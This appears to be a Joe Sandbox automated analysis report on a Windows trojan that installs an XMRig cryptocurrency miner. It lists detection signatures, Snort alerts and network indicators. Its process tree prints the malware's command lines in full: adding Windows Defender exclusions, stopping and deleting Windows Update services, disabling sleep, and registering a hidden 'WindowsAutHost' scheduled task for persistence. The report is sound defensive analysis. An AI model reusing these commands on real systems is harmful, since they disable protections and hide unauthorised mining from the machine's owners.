Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8iTXwpHCHb.exe

Overview

General Information

Sample Name:8iTXwpHCHb.exe
Analysis ID:735874
MD5:e6001aac5a3ee379149fd36bb6fb0d6f
SHA1:071044b203de973c31e2504411cfa445b95402cf
SHA256:e244f4b3b1614865dcd266ca2e057a1d7aa2a09c87bc1feb823fb1ac858f4fa2
Tags:exetrojan
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Sigma detected: Stop multiple services
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Modifies power options to not sleep / hibernate
Writes to foreign memory regions
Query firmware table information (likely to detect VMs)
Protects its processes via BreakOnTermination flag
Uses cmd line tools excessively to alter registry or file data
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sample is not signed and drops a device driver
Machine Learning detection for sample
Creates files in the system32 config directory
Found hidden mapped module (file has been removed from disk)
Tries to evade analysis by execution special instruction (VM detection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
PE file contains section with special chars
Uses powercfg.exe to modify the power settings
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Entry point lies outside standard sections
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Found inlined nop instructions (likely shell or obfuscated code)
PE file contains an invalid checksum
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Creates driver files
Uses reg.exe to modify the Windows registry
PE file contains more sections than normal
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • 8iTXwpHCHb.exe (PID: 5800 cmdline: C:\Users\user\Desktop\8iTXwpHCHb.exe MD5: E6001AAC5A3EE379149FD36BB6FB0D6F)
    • powershell.exe (PID: 1680 cmdline: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 1520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5776 cmdline: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 4768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • sc.exe (PID: 2160 cmdline: sc stop UsoSvc MD5: D79784553A9410D15E04766AAAB77CD6)
      • sc.exe (PID: 5248 cmdline: sc stop WaaSMedicSvc MD5: D79784553A9410D15E04766AAAB77CD6)
      • sc.exe (PID: 5744 cmdline: sc stop wuauserv MD5: D79784553A9410D15E04766AAAB77CD6)
      • sc.exe (PID: 2412 cmdline: sc stop bits MD5: D79784553A9410D15E04766AAAB77CD6)
      • sc.exe (PID: 1020 cmdline: sc stop dosvc MD5: D79784553A9410D15E04766AAAB77CD6)
      • reg.exe (PID: 5332 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 728 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 3736 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 6056 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 2432 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)
    • cmd.exe (PID: 4904 cmdline: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powercfg.exe (PID: 5868 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
      • powercfg.exe (PID: 5768 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
      • powercfg.exe (PID: 244 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
      • powercfg.exe (PID: 4952 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
    • powershell.exe (PID: 6104 cmdline: powershell <#ujtstfzc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsAutHost' /tr '''C:\Program Files\WindowsServices\WindowsAutHost'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsAutHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' } MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 2220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5712 cmdline: powershell <#agjywv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsAutHost" } Else { "C:\Program Files\WindowsServices\WindowsAutHost" } MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 1028 cmdline: "C:\Windows\system32\schtasks.exe" /run /tn WindowsAutHost MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
    • cmd.exe (PID: 5864 cmdline: cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\8iTXwpHCHb.exe" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • choice.exe (PID: 3672 cmdline: choice /C Y /N /D Y /T 3 MD5: EA29BC6BCB1EFCE9C9946C3602F3E754)
  • WindowsAutHost (PID: 964 cmdline: C:\Program Files\WindowsServices\WindowsAutHost MD5: 5B8C8BDDB55534C3C0DDA7CB094EEC00)
    • powershell.exe (PID: 1308 cmdline: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 3736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4328 cmdline: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 1948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • sc.exe (PID: 2448 cmdline: sc stop UsoSvc MD5: D79784553A9410D15E04766AAAB77CD6)
      • sc.exe (PID: 3208 cmdline: sc stop WaaSMedicSvc MD5: D79784553A9410D15E04766AAAB77CD6)
      • sc.exe (PID: 4764 cmdline: sc stop wuauserv MD5: D79784553A9410D15E04766AAAB77CD6)
      • sc.exe (PID: 476 cmdline: sc stop bits MD5: D79784553A9410D15E04766AAAB77CD6)
      • sc.exe (PID: 5356 cmdline: sc stop dosvc MD5: D79784553A9410D15E04766AAAB77CD6)
      • reg.exe (PID: 5444 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 5480 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 5504 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 5508 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 5632 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)
    • cmd.exe (PID: 4696 cmdline: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 1840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powercfg.exe (PID: 5456 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
      • powercfg.exe (PID: 2024 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
      • powercfg.exe (PID: 572 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
      • powercfg.exe (PID: 2224 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
    • powershell.exe (PID: 780 cmdline: powershell <#ujtstfzc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsAutHost' /tr '''C:\Program Files\WindowsServices\WindowsAutHost'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsAutHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' } MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • conhost.exe (PID: 2968 cmdline: C:\Windows\system32\conhost.exe qeiyvjdhkxdq MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 1004 cmdline: cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 3248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 1248 cmdline: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 5032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 1688 cmdline: cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 1096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • WMIC.exe (PID: 4184 cmdline: wmic PATH Win32_VideoController GET Name, VideoProcessor MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Sigma Signatures

    Operating System Destruction

    barindex
    Sigma detected: Stop multiple services
    Source: Process startedAuthor: Joe Security: Data: Command: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, CommandLine: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\8iTXwpHCHb.exe, ParentImage: C:\Users\user\Desktop\8iTXwpHCHb.exe, ParentProcessId: 5800, ParentProcessName: 8iTXwpHCHb.exe, ProcessCommandLine: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, ProcessId: 5776, ProcessName: cmd.exe

    Snort Signatures

    Timestamp:192.168.2.4199.247.19.11649695802831812 11/02/22-12:58:39.104701
    SID:2831812
    Source Port:49695
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.48.8.8.856572532036289 11/02/22-12:58:39.057419
    SID:2036289
    Source Port:56572
    Destination Port:53
    Protocol:UDP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.431.31.198.10649696802035420 11/02/22-12:58:40.227957
    SID:2035420
    Source Port:49696
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for submitted file
    Source: 8iTXwpHCHb.exeVirustotal: Detection: 37%Perma Link
    Source: 8iTXwpHCHb.exeReversingLabs: Detection: 26%
    Antivirus / Scanner detection for submitted sample
    Source: 8iTXwpHCHb.exeAvira: detected
    Antivirus detection for dropped file
    Source: C:\Program Files\WindowsServices\WindowsAutHostAvira: detection malicious, Label: HEUR/AGEN.1249215
    Machine Learning detection for sample
    Source: 8iTXwpHCHb.exeJoe Sandbox ML: detected
    Machine Learning detection for dropped file
    Source: C:\Program Files\WindowsServices\WindowsAutHostJoe Sandbox ML: detected

    Bitcoin Miner

    barindex
    Yara detected Xmrig cryptocurrency miner
    Source: Yara matchFile source: dump.pcap, type: PCAP
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeDirectory created: C:\Program Files\WindowsServicesJump to behavior
    Source: C:\Program Files\WindowsServices\WindowsAutHostDirectory created: C:\Program Files\Google\LibsJump to behavior
    Source: C:\Windows\System32\cmd.exeDirectory created: C:\Program Files\Google\Libs\g.log
    Source: 8iTXwpHCHb.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WindowsAutHost, 00000020.00000002.580279703.00000136061B5000.00000004.00000020.00020000.00000000.sdmp, WR64.sys.32.dr
    Source: C:\Windows\System32\conhost.exeCode function: 4x nop then sub rsp, 38h58_2_00007FF6935E7500
    Source: C:\Windows\System32\conhost.exeCode function: 4x nop then sub rsp, 38h58_2_00007FF6935EE4F0
    Source: C:\Windows\System32\conhost.exeCode function: 4x nop then push r1358_2_00007FF6935E7430
    Source: C:\Windows\System32\conhost.exeCode function: 4x nop then sub rsp, 38h58_2_00007FF6935EB330
    Source: C:\Windows\System32\conhost.exeCode function: 4x nop then push r1358_2_00007FF6935F1860
    Source: C:\Windows\System32\conhost.exeCode function: 4x nop then push r1358_2_00007FF6935F1860
    Source: C:\Windows\System32\conhost.exeCode function: 4x nop then push r1358_2_00007FF6935F1860
    Source: C:\Windows\System32\conhost.exeCode function: 4x nop then mov qword ptr [rsp+28h], 0000000000000000h58_2_00007FF6935F1860
    Source: C:\Windows\System32\conhost.exeCode function: 4x nop then mov rax, qword ptr [rcx]58_2_00007FF6935E4860
    Source: C:\Windows\System32\conhost.exeCode function: 4x nop then push r1358_2_00007FF6935F17C0
    Source: C:\Windows\System32\conhost.exeCode function: 4x nop then push r1358_2_00007FF6935F17C0
    Source: C:\Windows\System32\conhost.exeCode function: 4x nop then push r1358_2_00007FF6935F17C0
    Source: C:\Windows\System32\conhost.exeCode function: 4x nop then push r1358_2_00007FF6935F17C0
    Source: C:\Windows\System32\conhost.exeCode function: 4x nop then push r1358_2_00007FF6935F17C0
    Source: C:\Windows\System32\conhost.exeCode function: 4x nop then mov qword ptr [rsp+28h], 0000000000000000h58_2_00007FF6935F17C0
    Source: C:\Windows\System32\conhost.exeCode function: 4x nop then push r1358_2_00007FF6935F16D0
    Source: C:\Windows\System32\conhost.exeCode function: 4x nop then push r1358_2_00007FF6935F16D0
    Source: C:\Windows\System32\conhost.exeCode function: 4x nop then push r1358_2_00007FF6935F1610
    Source: C:\Windows\System32\conhost.exeCode function: 4x nop then push r1358_2_00007FF6935F1610
    Source: C:\Windows\System32\conhost.exeCode function: 4x nop then push r1358_2_00007FF6935F1610
    Source: C:\Windows\System32\conhost.exeCode function: 4x nop then push r1358_2_00007FF6935F1610

    Networking

    barindex
    Snort IDS alert for network traffic
    Source: TrafficSnort IDS: 2036289 ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) 192.168.2.4:56572 -> 8.8.8.8:53
    Source: TrafficSnort IDS: 2831812 ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8) 192.168.2.4:49695 -> 199.247.19.116:80
    Source: TrafficSnort IDS: 2035420 ET TROJAN Win32/Pripyat Activity (POST) 192.168.2.4:49696 -> 31.31.198.106:80
    Source: WindowsAutHost, 00000020.00000002.580279703.00000136061B5000.00000004.00000020.00020000.00000000.sdmp, WR64.sys.32.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
    Source: WindowsAutHost, 00000020.00000002.580279703.00000136061B5000.00000004.00000020.00020000.00000000.sdmp, WR64.sys.32.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
    Source: WindowsAutHost, 00000020.00000002.580279703.00000136061B5000.00000004.00000020.00020000.00000000.sdmp, WR64.sys.32.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
    Source: WindowsAutHost, 00000020.00000002.580279703.00000136061B5000.00000004.00000020.00020000.00000000.sdmp, WR64.sys.32.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
    Source: powershell.exe, 00000007.00000002.415968145.00000237E18BC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.465776003.0000020D2401C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.644120231.0000019FA77D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.515105452.0000019FA77D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.623552015.000002376E64E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 00000007.00000002.419133402.00000237E1C6F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000003.375792050.00000237E1C6F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000003.392349439.00000237E1C6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsof
    Source: powershell.exe, 00000026.00000002.644851259.0000019FA7837000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.516178284.0000019FA7825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.osofts/Microt0
    Source: powershell.exe, 00000007.00000002.413252609.00000237D95BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.639801187.0000019F9F49B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000026.00000002.590838599.0000019F8F647000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000007.00000002.396775326.00000237C9768000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.590838599.0000019F8F647000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000007.00000002.395084188.00000237C9561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.444436769.0000020D0BAC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.587356639.0000019F8F441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.587692706.0000023700001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000007.00000002.396775326.00000237C9768000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.590838599.0000019F8F647000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000026.00000002.590838599.0000019F8F647000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 0000001A.00000002.470297536.0000020D2408B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coDk
    Source: powershell.exe, 00000026.00000002.639801187.0000019F9F49B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000026.00000002.639801187.0000019F9F49B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000026.00000002.639801187.0000019F9F49B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000026.00000002.590838599.0000019F8F647000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000007.00000003.365569673.00000237CB1C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.448943625.0000020D0BCC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.627931463.0000019F909FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.629177405.0000019F90AAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.626183947.0000019F90914000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.632077474.0000019F90C6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.627601047.0000019F909C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: powershell.exe, 00000026.00000002.644851259.0000019FA7837000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.516178284.0000019FA7825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.c
    Source: powershell.exe, 00000007.00000002.413252609.00000237D95BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.639801187.0000019F9F49B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: unknownDNS traffic detected: queries for: pool.hashvault.pro

    Operating System Destruction

    barindex
    Protects its processes via BreakOnTermination flag
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess information set: 01 00 00 00 Jump to behavior

    System Summary

    barindex
    PE file contains section with special chars
    Source: 8iTXwpHCHb.exeStatic PE information: section name: .7Z\
    Source: 8iTXwpHCHb.exeStatic PE information: section name: .u4~
    Source: WindowsAutHost.0.drStatic PE information: section name: .7Z\
    Source: WindowsAutHost.0.drStatic PE information: section name: .u4~
    Uses powercfg.exe to modify the power settings
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
    Source: C:\Program Files\WindowsServices\WindowsAutHostFile deleted: C:\Windows\Temp\34E5.tmpJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
    Source: C:\Windows\System32\conhost.exeCode function: 58_2_00007FF6935C225058_2_00007FF6935C2250
    Source: C:\Windows\System32\conhost.exeCode function: 58_2_00007FF6935C29F058_2_00007FF6935C29F0
    Source: C:\Windows\System32\conhost.exeCode function: 58_2_00007FF6935C15C058_2_00007FF6935C15C0
    Source: C:\Windows\System32\conhost.exeCode function: 58_2_00007FF6935DE41058_2_00007FF6935DE410
    Source: C:\Windows\System32\conhost.exeCode function: 58_2_00007FF6935C62A058_2_00007FF6935C62A0
    Source: C:\Windows\System32\conhost.exeCode function: 58_2_00007FF6935E18B058_2_00007FF6935E18B0
    Source: C:\Windows\System32\conhost.exeCode function: String function: 00007FF6935F17C0 appears 59 times
    Source: C:\Windows\System32\conhost.exeCode function: String function: 00007FF6935F0580 appears 107 times
    Source: C:\Windows\System32\conhost.exeCode function: 58_2_00007FF6935C4040 NtDelayExecution,58_2_00007FF6935C4040
    Source: C:\Program Files\WindowsServices\WindowsAutHostFile created: C:\Program Files\Google\Libs\WR64.sysJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
